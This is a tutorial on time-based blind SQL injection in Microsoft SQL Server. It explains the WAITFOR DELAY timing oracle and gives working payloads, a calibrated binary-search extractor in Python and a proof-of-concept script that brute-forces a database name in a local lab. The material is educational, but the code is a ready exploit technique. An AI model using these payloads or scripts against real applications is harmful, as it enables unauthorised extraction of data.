
Time-Based Blind SQL Injection

September 1st, 2011

Overview
=======
Blind SQL Injection is an attack in which the attacker only gets an indication of whether the injected query executed successfully; the query results themselves are never returned to the attacker.
Most of the time that indication is based on server errors or customized application errors, i.e. on the application responding differently when the query fails.

Time-Based Blind SQL Injection
======================
Sometimes the attacker cannot tell whether the query executed successfully, because neither the server nor the application shows an error and the response looks the same either way.
One technique that still yields an indication of the query's outcome is called Time-Based Blind SQL Injection.
With this technique the attacker injects functions that take a measurable amount of time to finish (for example BENCHMARK in MySQL, or WAITFOR DELAY in Microsoft SQL Server), typically wrapped in a condition so that the delay only happens when the condition is true. By measuring how long the application takes to respond, the attacker can tell whether the query ran and whether the injected condition held, even though the response body never changes. Because the response time is the only signal, the injected delay must be long enough to stand out from normal network latency and jitter, which is also what makes the technique slow: every yes/no answer costs one deliberately delayed request.

Discovering Database Details
====================
An attacker can extract information from the database with Time-Based Blind SQL Injection, one character at a time.
For example, an attacker can brute force the database's name with this technique:
1.    Record the time before the query execution.
2.    Execute the following query:

declare @s varchar(100)
select @s = db_name()
if (ascii(substring(@s,1,1))) = 65
waitfor delay '0:0:10'
else
waitfor delay '0:0:2'

3.    Record the time after the query execution.
4.    Calculate how long the query took to run:
4.1.    if it took 10 seconds, the first character of the database's name is 'A' (ASCII 65);
4.2.    if it took 2 seconds, the first character of the database's name is NOT 'A'.
The else branch deliberately waits as well, so that a query that was blocked or failed (and therefore returned almost immediately) is not mistaken for a "not A" answer. Repeating steps 1 to 4 for every candidate character at every position reveals the whole name.
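The procedure above, written out as an added example; this is not code from the original article or from GreenSQL. It builds the same IF ... WAITFOR DELAY payload (with db_name() inlined instead of assigned to @s), but binary-searches each character's ASCII value instead of testing every printable character for equality, stops when SUBSTRING runs past the end of the name (ASCII('') is NULL, so no comparison with it is ever true), and calibrates the true/false time threshold against conditions with a known outcome on the target instead of assuming a clean 10-second response. The function names, the SimulatedMSSQL class (a constructed stand-in that returns the seconds a real SQL Server would have spent in WAITFOR DELAY, so the example runs offline) and the "AdventureWorks" target name are assumptions of this example; the timed() wrapper is what you would put around a real pyodbc cursor instead of the simulator.

```python
import operator
import re
import time

SLOW = 10  # seconds of WAITFOR DELAY when the condition holds (same values as the article)
FAST = 2   # seconds when it does not; non-zero so a blocked/failed query (~0 s) is distinguishable


def char_payload(expr, position, cmp, value, slow=SLOW, fast=FAST):
    """T-SQL that waits `slow` seconds if ascii(substring(expr, position, 1)) <cmp> value, else `fast`."""
    return (f"if (ascii(substring({expr}, {position}, 1))) {cmp} {value} "
            f"waitfor delay '0:0:{slow}' else waitfor delay '0:0:{fast}'")


def calibration_payload(truth, slow=SLOW, fast=FAST):
    """T-SQL with a condition whose outcome is known, used to measure the two delays on the target."""
    return (f"if 1={1 if truth else 0} "
            f"waitfor delay '0:0:{slow}' else waitfor delay '0:0:{fast}'")


def timed(execute):
    """Wrap a query executor (e.g. a pyodbc cursor's execute) so it returns elapsed wall-clock seconds."""
    def run(sql):
        start = time.perf_counter()
        execute(sql)
        return time.perf_counter() - start
    return run


def make_oracle(timed_query, slow=SLOW, fast=FAST):
    """Turn a timed executor into a boolean oracle for injected conditions.

    The threshold is the midpoint between a measured known-true and a measured
    known-false response, so latency that shifts both delays does not break the test.
    """
    t_true = timed_query(calibration_payload(True, slow, fast))
    t_false = timed_query(calibration_payload(False, slow, fast))
    threshold = (t_true + t_false) / 2
    return lambda sql: timed_query(sql) >= threshold


def extract_string(timed_query, expr="db_name()", max_len=100):
    """Recover the value of a T-SQL string expression one character at a time.

    Each character costs 7 queries (binary search over ASCII 0-127) instead of
    the up-to-94 equality tests of a linear scan over printable characters.
    """
    condition_holds = make_oracle(timed_query)
    result = ""
    for position in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: the ASCII value of this character is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if condition_holds(char_payload(expr, position, ">", mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # SUBSTRING past the end returns '', ASCII('') is NULL and NULL > n is never
            # true, so every comparison fails and the search collapses to 0: end of string.
            break
        result += chr(lo)
    return result


class SimulatedMSSQL:
    """Constructed stand-in for SQL Server (assumption of this example): parses the payloads above
    and returns the seconds a real server would have spent in WAITFOR DELAY (virtual clock, no sleep)."""
    _CHAR = re.compile(r"if \(ascii\(substring\((.+?), (\d+), 1\)\)\) ([<>=]) (\d+) "
                       r"waitfor delay '0:0:(\d+)' else waitfor delay '0:0:(\d+)'$")
    _CAL = re.compile(r"if 1=(\d) waitfor delay '0:0:(\d+)' else waitfor delay '0:0:(\d+)'$")
    _OPS = {">": operator.gt, "<": operator.lt, "=": operator.eq}

    def __init__(self, db_name):
        self.db_name = db_name  # what db_name() returns on this "server"
        self.queries = 0

    def timed_query(self, sql):
        self.queries += 1
        if m := self._CAL.match(sql):
            holds, slow, fast = m.group(1) == "1", int(m.group(2)), int(m.group(3))
        elif m := self._CHAR.match(sql):
            _expr, position, cmp, value, slow, fast = m.groups()
            ch = self.db_name[int(position) - 1:int(position)]  # '' past the end, like SUBSTRING
            # ASCII('') is NULL; a comparison with NULL is UNKNOWN, so IF takes the ELSE branch
            holds = ch != "" and self._OPS[cmp](ord(ch), int(value))
            slow, fast = int(slow), int(fast)
        else:
            raise ValueError(f"unexpected payload: {sql!r}")
        return float(slow if holds else fast)


if __name__ == "__main__":
    server = SimulatedMSSQL("AdventureWorks")  # constructed target, same database name as the article
    name = extract_string(server.timed_query)
    print(f"db_name() = {name!r} after {server.queries} timed queries")
```

Against the real test environment described later in the article you would call extract_string(timed(cursor.execute)) with the pyodbc cursor. Two calibration queries plus 7 queries per character (15 positions for "AdventureWorks" including the end-of-string probe) is 107 requests, each 2 or 10 seconds, so the run still takes minutes; the delays can be shortened, but the gap between SLOW and FAST has to stay well above the latency jitter of the path to the server or the oracle starts returning wrong bits.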

Database's name brute-forcer (Proof-of-Concept in Python):
==========================================

Tested Environment

1.    Windows 7 64-bit.
2.    MSSQL Server 2008.
3.    Database: AdventureWorks, can be downloaded from: http://msftdbprodsamples.codeplex.com/releases/view/37109
4.    SQL Server Configuration:
a.    TCP/IP – Enabled.
b.    Authentication Mode – Both SQL Server and Windows.
c.    SQL User:
i.    Name: GreenSQL
ii.    Password: GreenSQL
iii.    Server Roles: sysadmin
iv.    User Mapping: AdventureWorks


This code is for educational purposes only!

Python Source Code
===============

##################################################
##   GreenSQL Time-Based Blind SQL Injection    ##
##          Database Name Brute Forcer          ##
##              Proof-of-Concept                ##
##  This code is for educational purposes only  ##
##################################################

import pyodbc
import time

## Connect to the DB (the tested environment above: local MSSQL, SQL user GreenSQL/GreenSQL)
cnxn = pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=AdventureWorks;UID=GreenSQL;PWD=GreenSQL')
cursor = cnxn.cursor()

## Set variables
DBName = ''
FirstRun = time.time()
ASCIIRange = range(32, 127)   ## printable ASCII, from space (32) through '~' (126)

## Discover DB Name (Brute Force): one position at a time, one candidate character at a time
for i in range(1, 100):
    found = False
    for CurrChr in ASCIIRange:
        print("Trying Char: " + chr(CurrChr) + " @ position: " + str(i))
        print("DBName: " + DBName)
        query = 'declare @s varchar(100) '
        query = query + 'select @s = db_name() '
        query = query + 'if (ascii(substring(@s, '
        query = query + str(i)
        query = query + ', 1))) = '
        query = query + str(CurrChr)
        query = query + " waitfor delay '0:0:10' "   ## if the current character matches, wait 10 seconds
        query = query + 'else '
        query = query + "waitfor delay '0:0:2'"      ## otherwise wait 2 seconds
        print(query)
        StartTime = time.time()   ## Set the time before query execution (UNIX time)
        cursor.execute(query)     ## Execute the query
        EndTime = time.time()     ## Set the time after query execution (UNIX time)
        if EndTime - StartTime >= 10:   ## if the current character matches,
            DBName = DBName + chr(CurrChr)   ## add it to the DBName string
            found = True
            break
    if not found:   ## the whole range was tried without a match: no character at this position, the name is complete
        break

## Print the findings and statistics
DoneTime = time.time()
print("DB Name: " + DBName)
print("It took " + str(int(DoneTime - FirstRun)) + " seconds!")
